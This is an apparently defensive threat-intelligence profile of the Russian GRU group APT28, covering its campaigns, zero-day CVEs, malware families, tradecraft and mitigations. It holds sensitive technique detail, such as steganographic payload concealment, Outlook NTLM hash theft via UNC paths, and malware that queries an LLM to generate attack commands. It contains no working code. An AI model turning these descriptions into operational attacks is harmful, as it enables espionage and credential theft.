analyst@nohacky:~/threat-actors$
cat/threat-actors/apt28-fancy-bear
analyst@nohacky:~/apt28-fancy-bear.html
active threatprofile
typeNation-State
threat_levelCritical
statusActive
originRussia
last_updated2026-04-17
FB
apt28-fancy-bear

APT28 / Fancy Bear

also known as: Sofacy Strontium Forest Blizzard Pawn Storm Sednit IRON TWILIGHT BlueDelta Fighting Ursa Storm-2754 TA422 ITG05 UAC-0028 FROZENLAKE TG-4127 SNAKEMACKEREL

Russia's GRU Military Intelligence Unit 26165 — active for over two decades and responsible for some of the most consequential cyber operations in history. This includes the 2016 DNC breach, election interference campaigns across multiple countries, sustained NATO targeting, the May 2025 campaign against Western logistics firms supporting Ukraine (formalized in a 21-agency advisory from 11 allied nations), the Operation RoundPress MDaemon zero-day (CVE-2024-11182) webmail espionage campaign documented by ESET, Operation FrostArmada — a global router DNS hijacking campaign peaking at 18,000 infected devices across 120 countries — and in early 2026 the simultaneous exploitation of two unpatched Microsoft vulnerabilities alongside the deployment of the PRISMEX malware suite against Ukraine and NATO allies.

attributed originRussia
suspected sponsorGRU — Unit 26165 (85th GTsSS)
first observed~2004
primary motivationEspionage / political interference
primary targetsGovernment, Defense, Political
known campaigns25+ major confirmed
mitre att&ck groupG0007
target regionsEurope, USA, Ukraine (primary)
threat levelCRITICAL

Overview

APT28 is one of the most prolific, well-resourced, and technically sophisticated nation-state threat actors ever documented. Operated by Russia's GRU military intelligence directorate — specifically the 85th Main Special Service Center (85th GTsSS), Military Unit 26165 — the group has been conducting offensive cyber operations since at least 2004, predating many of the security frameworks now used to defend against it. The U.S. Department of Justice indicted 12 GRU officers affiliated with this unit in July 2018, providing some of the most detailed public attribution of any state-sponsored threat actor on record.

What distinguishes APT28 from comparable state-sponsored actors is the breadth of its operational objectives. Unlike groups focused narrowly on intelligence collection, APT28 simultaneously pursues espionage, political interference, disinformation support, and direct disruption of adversary systems. The group has attacked the French election, the German Bundestag, U.S. political campaigns, NATO member military networks, Western logistics companies, and Ukrainian critical infrastructure — frequently running multiple campaigns concurrently across different target sectors and geographies.

The group's technical tradecraft is particularly notable for its willingness to burn zero-days at scale and rapidly weaponize newly disclosed vulnerabilities. In early 2026, APT28 simultaneously exploited two unpatched Microsoft vulnerabilities — CVE-2026-21513 in MSHTML and CVE-2026-21509 in Microsoft Office — deploying the PRISMEX malware suite in a coordinated campaign active since September 2025. Trend Micro's analysis confirmed the LNK exploit sample for CVE-2026-21513 appeared on VirusTotal on January 30, 2026 — eleven days before Microsoft's patch was released on February 10, 2026, confirming zero-day exploitation in the wild. Operating simultaneous zero-days signals high-priority targeting and significant intelligence resource expenditure.

2025 and early 2026 also saw two additional major documented operations. Operation FrostArmada, named by Lumen's Black Lotus Labs, ran from May 2025 and peaked in December 2025 with over 18,000 devices across 120 countries communicating with APT28's malicious DNS infrastructure. The FBI executed a court-authorized technical operation in April 2026 to disrupt it. Separately, Operation RoundPress, documented by ESET researcher Matthieu Faou, exploited XSS vulnerabilities across multiple webmail platforms — including a zero-day in MDaemon (CVE-2024-11182, CVSS 5.3) — to steal credentials and harvest emails from government and defense entities across Eastern Europe, Africa, and South America.

A May 2025 joint advisory (CISA AA25-141A), co-sealed by 11 allied nations and 21 intelligence agencies, formally detailed a sustained campaign targeting Western logistics and technology companies supporting Ukraine across air, sea, and rail transportation modes — including the compromise of RTSP-enabled cameras at Ukrainian border crossings and near military installations to physically monitor aid movement.

Denis Calderone, CTO of Suzu Labs, noted in April 2026 that a key aspect of APT28's operational profile is that its sophistication primarily manifests after initial access is achieved. Initial access methods — phishing, ClickFix social engineering, password spraying, exploitation of unpatched edge devices — remain consistent with what defenders encounter from less sophisticated actors. The distinction lies in what follows: long-dwell persistence, credential harvesting at scale, and precise intelligence collection aligned with GRU priorities.

One forensic detail rarely discussed outside specialist circles: FireEye's original 2014 attribution relied partly on the compile-time metadata embedded in APT28's malware binaries. Analysis showed the malware was compiled almost exclusively during a consistent window — Monday through Friday, 8am to 6pm Moscow Standard Time (UTC+3) — with a pronounced gap over Russian public holidays including Orthodox Christmas and New Year. This working-hours pattern, combined with Russian-language artifacts in the malware build environment and Cyrillic error strings in some variants, formed a core part of the original attribution before any human intelligence or government confirmation was available. FireEye director of threat intelligence Laura Galante summarized the group's activities as "state espionage" targeting both strategic adversaries and "media or influencers." These compile-time patterns still appear in more recent tooling variants where investigators have been able to analyze unstripped binaries.

warning

APT28 is known to maintain long-term dormant access in compromised networks, activating implants months or years after initial intrusion. Detection of one implant does not indicate full eviction. The FBI advisory on FrostArmada noted that rebooting a compromised router does not remove APT28's firmware modifications — a hardware factory reset is required.

Target Profile

APT28's targeting reflects GRU intelligence priorities: Western governments, NATO military infrastructure, political institutions, logistics networks, and Ukrainian entities. The group consistently targets organizations where access yields strategic intelligence or enables information operations. The May 2025 21-agency advisory confirmed the group's expanded focus on Western logistics and technology firms spanning air, sea, and rail transport modes — any organization handling the physical flow of aid to Ukraine is considered in-scope.

  • Government and diplomatic: Foreign ministries, embassies, and senior officials across Europe and North America. The German Bundestag breach (2015) compromised Parliament's IT systems, requiring a full rebuild. The May 2025 advisory confirmed ongoing targeting of foreign ministries and government agencies across at least 13 countries, including the U.S., Germany, France, Poland, Ukraine, Bulgaria, Czechia, Greece, Italy, Moldova, the Netherlands, Romania, and Slovakia.
  • Defense and military: NATO member defense ministries, contractors, defense industrial base, and military research institutions. The 2025 advisory noted APT28 targeted at least one manufacturer of industrial control system components for railway operations, and defense companies in Bulgaria and Romania producing Soviet-era weapons destined for Ukraine.
  • Political parties and campaigns: DNC and Clinton campaign (2016), Macron's En Marche campaign (2017), multiple European political parties. Stolen data is typically leaked to maximize political damage. France attributed a series of attacks on French entities since 2021, including entities linked to the 2024 Paris Olympics, to APT28.
  • Logistics and supply chain: A 2022–2025 campaign documented in CISA AA25-141A targeted trucking companies, port authorities, air traffic management systems, maritime operators, warehouse and customs management providers, GPS routing systems, and technology companies enabling Ukraine aid logistics. The goal was intelligence collection and potential sabotage of the aid flow.
  • Physical surveillance via camera hijacking: Since March 2022, APT28 has compromised RTSP-enabled IP cameras at Ukrainian border crossings, railway stations, military installations, and key road junctions — using default and brute-forced credentials — to physically monitor the movement of military and humanitarian aid into Ukraine.
  • Webmail and email systems: Operation RoundPress (documented by ESET, May 2025) targeted government entities and defense companies using Roundcube, Horde, MDaemon, and Zimbra webmail infrastructure via XSS exploitation. Primary victims included Ukrainian governmental entities and defense companies in Bulgaria, Romania, Greece, Serbia, Cyprus, Ecuador, and Cameroon.
  • Home and small office networking infrastructure: Operation FrostArmada (May 2025 – April 2026) targeted MikroTik and TP-Link routers in 120+ countries to build passive credential harvesting infrastructure targeting Microsoft 365 accounts of government agencies, law enforcement, and IT/cloud providers.
  • Media and think tanks: Organizations that shape Western policy and public opinion — access enables both intelligence collection and potential influence operations.

Tactics, Techniques & Procedures

Highly targeted emails with malicious Office documents or LNK files, customized with victim-relevant content and geopolitical lures (e.g., Ukrainian drone inventories, military training documents, aid logistics). Primary initial access vector across all documented campaigns.

Zero-day exploitation including simultaneous dual-vector campaigns (CVE-2026-21513 MSHTML + CVE-2026-21509 Office in 2026 PRISMEX campaign). Also: CVE-2023-23397 (Outlook NTLM hash leak), CVE-2024-11182 (MDaemon XSS zero-day, Operation RoundPress), CVE-2023-43770 (Roundcube XSS), CVE-2023-38831 (WinRAR), CVE-2023-50224 (TP-Link auth bypass, FrostArmada).

X-Agent, CHOPSTICK, PRISMEX loader, and newer implants inject into legitimate processes to evade endpoint detection. PRISMEX implements fileless execution via in-memory payload staging.

Command-and-control over HTTPS abusing legitimate cloud services — PRISMEX uses Filen.io for encrypted C2, making traffic blend with normal web activity. Trellix confirmed APT28 uses cloud storage infrastructure for key exchange in 2026 operations.

Mimikatz and custom variants to harvest credentials for lateral movement. FrostArmada extended credential harvesting to SOHO router layer, passively collecting NTLMv2 digests, OAuth tokens, and Microsoft 365 passwords from DNS-intercepted authentication traffic.

Systematic collection of email archives from compromised accounts — a core collection objective. Operation RoundPress's SpyPress payloads exfiltrate full mailbox contents, contact books, and login history. SpyPress.ROUNDCUBE creates persistent Sieve forwarding rules that survive script termination.

Registers domains closely mimicking targets' legitimate web-based email and login portals for credential phishing. FrostArmada extended this to DNS-level spoofing, returning fraudulent DNS records for Microsoft Outlook on the web and other services.

Extensive use of steganography — documented in BadPaw/MeowMeow and PRISMEX campaigns — to hide encrypted payloads in image files. PRISMEX uses custom steganography alongside COM hijacking to achieve persistence and evade modern security tooling.

SpyPress.MDAEMON (Operation RoundPress) bypasses two-factor authentication by exfiltrating 2FA secrets and creating application passwords, maintaining mailbox access even after password and 2FA code changes.

Microsoft documents Forest Blizzard deploying automated password spray tooling routed through Tor. The May 2025 multi-agency advisory highlighted reconstituted password spraying capabilities as a primary initial access vector alongside spear-phishing.

LoJax, first documented in 2018, is APT28's UEFI rootkit — the first UEFI rootkit attributed to a nation-state actor used in the wild. It survives OS reinstallation and hard drive replacement, requiring firmware-level remediation. FrostArmada's router compromises similarly survived standard factory resets.

Compromise of software update mechanisms and trusted third-party services to deliver implants to downstream targets. The May 2025 advisory noted APT28 exploited trust relationships between primary targets and their business partners to expand access to additional organizations.

February 2022: obtained enterprise WiFi credentials via password spraying, then pivoted through adjacent buildings' networks when MFA blocked direct internet use. Daisy-chained through dual-homed devices in neighboring organizations to reach a target's WiFi access points — a physical close-access operation conducted remotely from Russia. Documented by Volexity as the "Nearest Neighbor Attack" (MITRE Campaign C0051).

GooseEgg exploits CVE-2022-38028 (Windows Print Spooler, NSA-reported, patched October 2022) to achieve SYSTEM-level execution by modifying a JavaScript constraints file. Microsoft confirmed use since at least June 2020. CVE-2023-23397 (Outlook zero-day, CVSS 9.8) steals NTLMv2 hashes via automatic connection to attacker-controlled UNC paths triggered by calendar appointment reminders — no user interaction required.

Known Campaigns

PRISMEX — Multi-Stage Espionage & Disruption Against Ukraine and NATO Allies2025–2026

Active since September 2025 and peaking January–April 2026, this campaign was documented by Trend Micro and attributed to APT28 with high confidence. The PRISMEX malware suite (PrismexSheet, PrismexDrop, PrismexLoader, PrismexStager) is delivered via spear-phishing emails themed around military training and aid logistics, exploiting CVE-2026-21509 and CVE-2026-21513. The suite uses custom steganography, COM hijacking, and encrypted C2 via Filen.io to enable fileless execution. Lure documents included realistic Ukrainian drone inventories and military supplier price lists. Notably, PRISMEX includes both espionage and sabotage (wiper) capabilities — Trend Micro assessed the operation marks a shift toward tactical disruption alongside intelligence collection. Targets include Ukrainian defense, government, emergency services, and hydrometeorology, as well as logistics hubs in Poland, Romania, and Slovakia. A 72-hour concentrated spear-phishing burst January 28–30, 2026 delivered at least 29 distinct emails across nine Eastern European nations.

Operation FrostArmada — Global SOHO Router DNS Hijacking for Credential Theft2025–2026 (Disrupted April 2026)

Named by Lumen's Black Lotus Labs, FrostArmada began in May 2025 and reached peak activity in December 2025 with over 18,000 unique IP addresses across 120+ countries communicating with APT28-controlled DNS infrastructure. The campaign compromised MikroTik and TP-Link SOHO routers — exploiting CVE-2023-50224 (TP-Link WR841N authentication bypass) — and modified DNS settings to redirect authentication traffic through adversary-in-the-middle (AitM) nodes, harvesting Microsoft 365 passwords, OAuth tokens, and NTLMv2 digests without deploying any endpoint malware. Microsoft confirmed AitM attacks against Microsoft Outlook on the web subdomains. The operation ran two parallel branches: one for device compromise and botnet growth, one for credential collection. An estimated 200+ organizations and 5,000 consumer devices were impacted. The FBI executed a court-authorized operation in April 2026 to disrupt the infrastructure via DNS resets on affected routers.

Operation RoundPress — Webmail XSS Espionage Including MDaemon Zero-Day2023–2025

Documented by ESET researcher Matthieu Faou (published May 2025), Operation RoundPress exploited XSS vulnerabilities in Roundcube (CVE-2023-43770), Horde, MDaemon, and Zimbra (CVE-2024-27443) to inject malicious JavaScript (the SpyPress family of payloads) into victims' webmail sessions without any additional user interaction beyond opening the email. CVE-2024-11182, the MDaemon zero-day (CVSS 5.3), was patched in MDaemon version 24.5.1 on November 14, 2024 — after ESET disclosed it to the vendor on November 1, 2024. SpyPress.MDAEMON could bypass two-factor authentication by extracting the 2FA secret and creating an application password, maintaining persistent mailbox access even after credential changes. Primary victims were Ukrainian governmental entities and defense companies in Bulgaria and Romania producing Soviet-era weapons for Ukraine, with secondary targets in Greece, Serbia, Cyprus, Ecuador, and Cameroon. CISA added CVE-2024-11182 to its Known Exploited Vulnerabilities catalog on May 19, 2025.

Logistics & Supply Chain Espionage — NATO Aid Infrastructure Targeting2022–2025

Formalized in CISA Advisory AA25-141A, issued May 21, 2025 by 11 allied nations and 21 intelligence agencies (CISA, UK NCSC, Germany, France, Canada, Australia, Czech Republic, Poland, Denmark, Estonia, the Netherlands). The campaign targeted Western logistics entities and technology companies supporting Ukraine across air, sea, and rail transport — including defense contractors, port authorities, air traffic management systems, maritime operators, and warehouse management providers. APT28 exploited trust relationships between primary targets and their business partners to expand access. The advisory confirmed APT28 compromised RTSP-enabled IP cameras at Ukrainian border crossings, railway stations, and near military installations using default and brute-forced credentials to physically monitor aid movement. NCSC Director of Operations Paul Chichester stated the campaign posed "a serious risk to targeted organizations, including those involved in the delivery of assistance to Ukraine."

Dual Zero-Day Campaign — CVE-2026-21513 & CVE-2026-21509Early 2026

APT28 simultaneously exploited two unpatched Microsoft vulnerabilities — a MSHTML rendering engine flaw and a Microsoft Office security feature bypass — in a coordinated two-pronged campaign against government and defense targets in Ukraine, Slovakia, and Romania. Three distinct payload chains deployed including MiniDoor, PixyNetLoader, and BEARDSHELL. The LNK exploit for CVE-2026-21513 appeared on VirusTotal eleven days before Microsoft's February 10, 2026 patch, confirming zero-day exploitation in the wild. Trellix confirmed the campaign's multi-stage infection chain, noting the tradecraft reflected "a well-resourced, advanced adversary consistent with APT28's profile."

Read NoHacky briefing
BadPaw / MeowMeow — Ukraine Espionage Campaign2026

ClearSky documented a sophisticated multi-stage espionage campaign deploying two previously undocumented malware families — BadPaw (.NET loader) and MeowMeow (backdoor) — against Ukrainian organizations. The operation used steganography to hide payloads in image files, implemented sandbox evasion, and used geopolitically tailored lures. Russian-language artifacts and targeting profile link the campaign to APT28 with high confidence.

Read NoHacky briefing
U.S. Election Interference — DNC / Podesta Breach2016

Compromised the Democratic National Committee and John Podesta's email through spear-phishing, exfiltrating thousands of emails subsequently released via WikiLeaks and DCLeaks. The operation was designed not just for intelligence collection but to influence the U.S. presidential election. A Mueller investigation grand jury indicted 12 GRU Unit 26165 officers in July 2018, and the U.S. Department of Justice charged five GRU officers in October 2018 for related influence and disinformation operations including attacks on WADA, the OPCW, and a U.S. nuclear facility.

Operation Sofacy — German Bundestag Breach2015

Compromised the IT systems of the German Parliament, exfiltrating approximately 16 gigabytes of data over several weeks. The breach required a complete system rebuild of Parliament's IT infrastructure. German authorities formally attributed the attack to APT28/GRU in May 2020. The same period saw APT28 compromise France's TV5 Monde television station, as confirmed by CrowdStrike.

Olympic Destroyer / 2018 Winter Olympics2018

Destructive wiper malware deployed against the Winter Olympics opening ceremony in Pyeongchang, South Korea — deliberately designed to implicate other threat actors through false flag indicators pointing to North Korea and China. Ultimately attributed to GRU/Sandworm with APT28 involvement. The same 2018 indictment period also covered APT28 attacks against WADA (releasing medical records of athletes including Simone Biles and Serena Williams), the OPCW, and the Spiez Swiss Chemicals Laboratory.

2017 French Election — Macron Campaign Targeting2017

APT28 targeted Emmanuel Macron's En Marche campaign ahead of the French presidential election, conducting credential phishing campaigns and attempting to compromise campaign communications. France's ANSSI has since documented sustained APT28 targeting of French entities, including a 2023 campaign against French public and private sector organizations and entities connected to the 2024 Paris Olympics.

LAMEHUG — First Documented LLM-Integrated Malware2025

On July 10, 2025, Ukraine's CERT-UA discovered a spear-phishing campaign against Ukrainian government executive authorities deploying a Python-based infostealer it named LAMEHUG — the first publicly documented malware by any threat actor to operationally integrate a Large Language Model at runtime. The phishing emails were sent from a compromised Ukrainian ministry account and carried a ZIP archive named "Додаток.pdf.zip" (Ukrainian for "Appendix"). Inside was a .pif executable (an obscure MS-DOS executable format used to disguise the payload), compiled with PyInstaller. LAMEHUG's defining characteristic is that it generates its own attack commands dynamically by querying Alibaba Cloud's Qwen 2.5-Coder-32B-Instruct model via the Hugging Face API — base64-encoded text prompts describing tasks ("gather system information") are sent over HTTPS to the model, which returns OS commands executed on the victim system. This means the command logic is not hardcoded and cannot be detected by static signature analysis. The malware collects system information and searches for Office, PDF, and TXT files, exfiltrating via SFTP or HTTP POST to compromised infrastructure. CERT-UA attributes the campaign to UAC-0001 (APT28) with moderate confidence. Picus Security assessed LAMEHUG as a proof-of-concept that demonstrates APT28 is actively exploring AI-assisted adaptive attack techniques. Later variants used filenames impersonating AI image generators (AI_generator_uncensored_Canvas_PRO_v0.9.exe) — making legitimate AI tool requests in the background while executing the infostealer payload.

Nearest Neighbor Attack — Remote Close-Access via Daisy-Chained WiFi2022

Detected by Volexity on February 4, 2022 at a Washington D.C. organization conducting Ukraine-related research, the Nearest Neighbor Attack represents one of the most technically creative documented intrusions in APT28's history. Unable to use stolen enterprise WiFi credentials over the public internet (blocked by MFA), APT28 instead compromised multiple organizations in adjacent buildings within wireless range of the target — daisy-chaining through dual-homed systems (machines connected to both Ethernet and WiFi) until reaching a device that could connect to three wireless access points near the target's conference room windows. From there, they used RDP from an unprivileged account to move laterally and exfiltrate data, running a batch script (servtask.bat) to dump Windows registry hives (SAM, Security, System) compressed into a ZIP archive. Privilege escalation was achieved via GooseEgg exploiting CVE-2022-38028, a Windows Print Spooler zero-day reported by the NSA and patched in October 2022. Volexity's investigation confirmed the target was being accessed to collect data on individuals with Ukraine expertise. Microsoft's April 2024 research on GooseEgg confirmed the indicators of compromise overlapped with Volexity's 2022 findings. Volexity described the technique as providing "all the benefits of being in close physical proximity to the target, while allowing the operator to be thousands of miles away" — effectively an OPCW-style close-access operation executed entirely from Russia.

CVE-2023-23397 — Outlook NTLM Hash Theft at Scale2022–2023

APT28 exploited CVE-2023-23397, a critical zero-day in Microsoft Outlook (CVSS 9.8), to silently steal NTLMv2 password hashes from victims who simply received — not even opened — a malicious calendar appointment email. The vulnerability causes Outlook to automatically connect to an attacker-controlled UNC path when a specially crafted reminder fires, leaking the victim's NTLMv2 hash to the attacker's server without any user interaction whatsoever. APT28 used this technique against European government, military, energy, and transportation sector organizations beginning as early as April 2022, roughly concurrent with Russia's full-scale invasion of Ukraine. Microsoft patched the vulnerability in March 2023 after it was reported by Ukraine's CERT-UA, and confirmed exploitation against organizations in Europe in the months prior. The stolen hashes can be used for relay attacks to authenticate to other internal services without cracking. MITRE documents this technique under T1203 (Exploitation for Client Execution) with the specific mechanism being calendar item delivery. Unit 42 (Palo Alto Networks) attributed exploitation directly to what they track as "Fighting Ursa" (APT28). Germany's BfV (Federal Office for the Protection of the Constitution) specifically warned German organizations in May 2024 that APT28 used this CVE in a broad 2022–2023 campaign against German government bodies and linked it to a DOJ indictment of GRU Unit 26165 officers.

OPCW Close-Access Operation — Physical Interception, The Hague2018

On April 10, 2018, four GRU Unit 26165 officers arrived at Amsterdam's Schiphol Airport on diplomatic passports, were met by a Russian embassy contact, rented a car loaded with specialized technical equipment including a wireless network panel antenna capable of intercepting WiFi traffic from a distance, and spent several days surveilling and photographing the OPCW headquarters building in The Hague. Their objective was to compromise the OPCW's internal WiFi network — timed to disrupt the organization's independent investigation of the Novichok poisoning of Sergei and Yulia Skripal in Salisbury, UK. The Dutch General Intelligence and Security Service (AIVD) intercepted the team, seized the equipment and approximately €20,000 in cash, and expelled them on an Aeroflot flight back to Moscow. Analysis of a laptop seized from officer Evgenii Serebriakov revealed prior WiFi connections to the Alpha Palmiers Hotel in Lausanne (September 2016, where a WADA conference was targeted), to Kuala Lumpur (December 2017, related to the MH17 downing investigation), and to locations in Rio de Janeiro (August 2016, targeting U.S. and Canadian anti-doping agencies). This single seized laptop confirmed APT28 had been conducting physical close-access WiFi operations across multiple continents over at least two years. The four individuals identified were: Aleksei Morenets and Evgenii Serebriakov (both Unit 26165, cyber operators), and Alexey Minin and Oleg Sotnikov (HUMINT operators, likely from a supporting unit). Both Morenets and Serebriakov were subsequently indicted in the October 2018 DOJ filing. The UK government confirmed the same Unit 26165 responsible for APT28 was behind the attempted OPCW breach.

Tools & Malware

APT28 maintains one of the widest documented custom toolchains of any nation-state actor, spanning every major operating system and covering the full intrusion lifecycle. The group regularly retires and replaces tooling when it is publicly burned, maintaining operational continuity across detection events.

  • X-Agent (Sofacy / JHUHUGIT): APT28's primary espionage implant, deployed across Windows, Linux, macOS, iOS, and Android. Modular architecture supporting keylogging, file exfiltration, screenshot capture, and remote command execution. In December 2016, CrowdStrike reported finding an Android variant of X-Agent embedded in an app (Попр-Д30.apk) developed by Ukrainian artillery officer Yaroslav Sherstuk to reduce D-30 howitzer targeting time from minutes to under 15 seconds — distributed on Ukrainian military forums from late 2014 through 2016. CrowdStrike assessed the implant could collect location and communications data from infected devices. However, this specific claim was substantially contested: the Ukrainian Ministry of Defense stated that artillery losses were far smaller than cited and not associated with hacking; the International Institute for Strategic Studies (IISS) denied that CrowdStrike had accurately used their data; security researcher Jeffrey Carr identified flaws in the attribution and noted the app lacked GPS functionality; and the app's developer denied it was compromised. The malware's presence in the app is verified; the operational impact on artillery losses is not. Mueller indictment officer Nikolay Kozachek was specifically named as having "developed, customized, and monitored" X-Agent across APT28 operations.
  • CHOPSTICK / X-Tunnel: Second-stage backdoor and encrypted tunneling tool used for persistent access and lateral movement after initial X-Agent deployment. Communicates over HTTP, HTTPS, and other channels.
  • LoJax: A UEFI rootkit — the first nation-state UEFI rootkit documented as used in the wild, discovered by ESET in 2018. Survives operating system reinstallation and hard drive replacement, requiring firmware-level remediation to fully remove.
  • PRISMEX suite (PrismexSheet / PrismexDrop / PrismexLoader / PrismexStager): Multi-component toolkit documented by Trend Micro (March 2026). Uses custom steganography, COM hijacking, and the Covenant C2 framework for fileless execution. Includes both espionage and wiper capabilities. C2 traffic routes through Filen.io cloud storage for detection evasion. The steganography implementation is technically specific: shellcode is concealed within valid PNG image files using the Least Significant Bit (LSB) of each pixel's four bytes — the extracted payload embeds the AES-CBC encryption key, IV, and encrypted content. Payloads are additionally Base64-encoded and bookended with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- strings to masquerade as X.509 certificate data.
  • SpyPress family (SpyPress.MDAEMON / SpyPress.ROUNDCUBE / SpyPress.HORDE / SpyPress.ZIMBRA): JavaScript payloads deployed via Operation RoundPress (ESET, 2025). Inject into victim webmail sessions via XSS to harvest credentials, exfiltrate email and contacts, and — in the MDAEMON variant — bypass two-factor authentication by extracting 2FA secrets and creating persistent application passwords.
  • HEADLACE / MASEPIE: Custom implants documented in the May 2025 21-agency advisory (CISA AA25-141A), deployed against logistics and technology companies supporting Ukraine aid operations.
  • NotDoor (Outlook backdoor): COM hijacking-based Outlook backdoor tied to APT28 by CERT-UA and security researchers. Used alongside BeardShell and the Covenant framework in 2026 campaign operations against European organizations.
  • Zebrocy: Reconnaissance implant deployed in early-stage operations to profile victim systems before committing more sophisticated tooling. Used against NATO member targets.
  • CORESHELL: A backdoor with data exfiltration capabilities, documented across multiple APT28 campaigns targeting European government agencies.
  • MiniDoor: Lightweight initial access backdoor documented in the 2026 dual zero-day campaign for establishing persistence before deploying heavier tooling.
  • PixyNetLoader: Network-aware loader documented in the 2026 campaign, used to stage and deploy additional payloads while profiling victim network topology.
  • BEARDSHELL: Custom web shell deployed in 2026 campaign operations for persistent server-side access. Explicitly attributed to APT28 by Ukrainian authorities and security researchers including CERT-UA.
  • BadPaw: Multi-stage .NET loader using steganography to hide encrypted payloads in image files. Implements sandbox detection before executing. Documented by ClearSky in 2026 against Ukrainian organizations.
  • MeowMeow: Backdoor payload delivered by BadPaw. Communicates over encrypted channels, implements anti-analysis techniques, and self-terminates if it detects a monitored environment.
  • Fysbis / Komplex / Drovorub: Platform-specific implants for Linux (Fysbis, Drovorub) and macOS (Komplex), extending APT28's reach beyond Windows endpoints to Linux servers and Apple workstations.
  • GooseEgg: Post-compromise privilege escalation tool used since at least June 2020 (possibly April 2019), documented by Microsoft in April 2024. Exploits CVE-2022-38028 (Windows Print Spooler) — a vulnerability reported by the NSA — to execute arbitrary code at SYSTEM level by modifying a JavaScript constraints file. GooseEgg spawns attacker-specified child processes with SYSTEM permissions, enabling credential theft and lateral movement. The embedded malicious DLL it drops typically contains "wayzgoose" in the filename (e.g., wayzgoose23.dll). Microsoft detects it as HackTool:Win64/GooseEgg. CVE-2022-38028 was patched in October 2022 but GooseEgg was still used in post-patch environments where patching had not been applied.
  • LAMEHUG: Python-based infostealer first documented by CERT-UA on July 10, 2025 — the first publicly confirmed malware by any threat actor to operationally integrate an LLM at runtime. Queries Alibaba Cloud's Qwen 2.5-Coder-32B-Instruct model via the Hugging Face API using base64-encoded prompts to generate OS commands dynamically, bypassing static signature detection. Compiled with PyInstaller, distributed as .pif, .exe, and .py variants. Collects system information and documents, exfiltrates via SFTP or HTTP POST. CERT-UA attributes to UAC-0001 (APT28) with moderate confidence. Assessed as a proof-of-concept that demonstrates APT28 is actively operationalizing AI-assisted attack tooling.
  • Downdelph: A backdoor with a custom bootkit for pre-OS persistence, predating LoJax and demonstrating APT28's longstanding focus on firmware-level implant research.
  • Cannon: A Trojan used in spear-phishing campaigns, typically delivered via malicious Office documents exploiting DDE or macro execution.

Mitigation & Defense

  • Zero-day patch velocity: APT28 exploits zero-days immediately upon or before public disclosure — CVE-2026-21513 was exploited eleven days before the patch was released. Establish emergency patching SLAs of 24–48 hours for critical Microsoft vulnerabilities, particularly in MSHTML, Office, Outlook, and Exchange. CISA's KEV catalog, which includes APT28-linked CVEs such as CVE-2024-11182, provides a verified prioritization baseline.
  • Webmail infrastructure hardening: Operation RoundPress exploited unpatched Roundcube, MDaemon, Horde, and Zimbra servers for years. Webmail platforms outside the Microsoft/Google ecosystem often go unpatched. Establish dedicated patch tracking for webmail infrastructure, disable automatic HTML email rendering where possible, enforce strict Content Security Policy headers, and regularly audit mailbox forwarding rules (Sieve rules) for unauthorized entries.
  • SOHO router security: FrostArmada compromised MikroTik and TP-Link routers at scale. Factory reset alone is insufficient — APT28's firmware modifications survived standard resets. Upgrade to MikroTik RouterOS 7.14.2 or later and TP-Link firmware released after March 2025. Change all default administrative credentials, disable SSH/Telnet on WAN interfaces, implement certificate pinning on MDM-managed corporate devices, and verify DNS server configurations across all network segments. Hardware factory reset followed by full firmware reflashing is required for confirmed compromises.
  • Email security hardening: Deploy advanced anti-phishing controls including sandboxed attachment detonation, disabling macros by default, and enforcing DMARC/DKIM/SPF across all domains. Spear-phishing — including via geopolitically tailored lures — remains APT28's primary initial access vector. NCSC and CISA both cite strong factors such as passkeys as preferred MFA mechanisms over SMS codes.
  • Credential protection and MFA: Deploy Windows Credential Guard, enforce LAPS for local admin accounts, monitor for credential dumping tool signatures, and implement phishing-resistant MFA (hardware tokens, passkeys) rather than SMS-based 2FA. APT28's SpyPress.MDAEMON demonstrated the ability to bypass TOTP-based 2FA by stealing the underlying secret. Password spraying through Tor is a documented APT28 tactic — block or alert on authentication from Tor exit nodes.
  • Cloud identity and OAuth security: FrostArmada targeted OAuth tokens for Microsoft 365 services at scale. Monitor for OAuth token usage from unexpected geographic locations, implement conditional access policies, and review application password lists for unauthorized entries (a specific SpyPress.MDAEMON persistence mechanism).
  • Network segmentation: Isolate sensitive systems (political communications, classified data stores, logistics coordination systems) on network segments with strict egress filtering. APT28 conducts broad lateral movement after initial compromise and exploits trust relationships between partner organizations to expand access.
  • Physical surveillance awareness: Internet-connected cameras at or near sensitive facilities (border crossings, military installations, logistics hubs, data centers) should use non-default credentials, be network-segmented from corporate infrastructure, run current firmware, and have WAN access disabled where not operationally required. APT28 accessed RTSP feeds using default and brute-forced credentials.
  • Threat intelligence integration: APT28 IOCs are among the most extensively documented of any threat actor. The MITRE ATT&CK G0007 entry, CISA AA25-141A, ESET's Operation RoundPress report, and Lumen/Black Lotus Labs FrostArmada analysis all provide verified, actionable indicator sets. Subscribe to threat intel feeds covering GRU/APT28 infrastructure — C2 IPs and domains rotate frequently but signature patterns remain consistent.
  • Assume long-dwell compromise: APT28 routinely maintains dormant access for months or years before activating implants. A single detected IOC or evicted implant should trigger full incident response, including historical log review for extended dwell indicators, not just point-in-time remediation.
analyst note

APT28 operates in parallel with Sandworm (GRU Unit 74455). While APT28 focuses on intelligence collection and political interference, Sandworm specializes in destructive operations. Organizations in APT28's target profile should assess their Sandworm exposure simultaneously — the two groups share infrastructure and targeting in Ukrainian operations. The 2018 DOJ indictment confirmed GRU Unit 74455 assisted Unit 26165 in several operations including close-access attacks against the OPCW.

Hack-and-Leak Doctrine

APT28 is one of the few state-sponsored groups that does not simply collect intelligence quietly — it weaponizes stolen data through a structured leak-and-amplification pipeline designed to maximize political damage. Understanding this pipeline separates APT28 from pure espionage actors and explains why its campaigns have outsized geopolitical impact far beyond the technical breach itself.

The doctrine operates in three phases. First, APT28 selects targets based on GRU information operations priorities — stolen data must have the capacity to embarrass, delegitimize, or destabilize a political actor. Second, stolen material is curated: not all exfiltrated data is released; specific emails, documents, and communications are selected to tell a particular narrative. Third, release is routed through cutouts to create deniability and amplify reach.

In the 2016 U.S. election operation, APT28 used two specific personas as release vehicles: DCLeaks (a fictitious "hacktivist" site established April 2016) and Guccifer 2.0 (a fabricated Romanian hacker persona). Both were directly operated by GRU Unit 26165 officers, as confirmed in the Mueller indictment. Guccifer 2.0 directly contacted and briefed U.S. journalists and political figures, laundering GRU-sourced material as independent hacktivist leaks. Material was also passed to WikiLeaks, which served as the primary publication vector for the DNC and Podesta emails. The Mueller investigation confirmed direct communication between GRU officers and WikiLeaks, including specific requests about release timing.

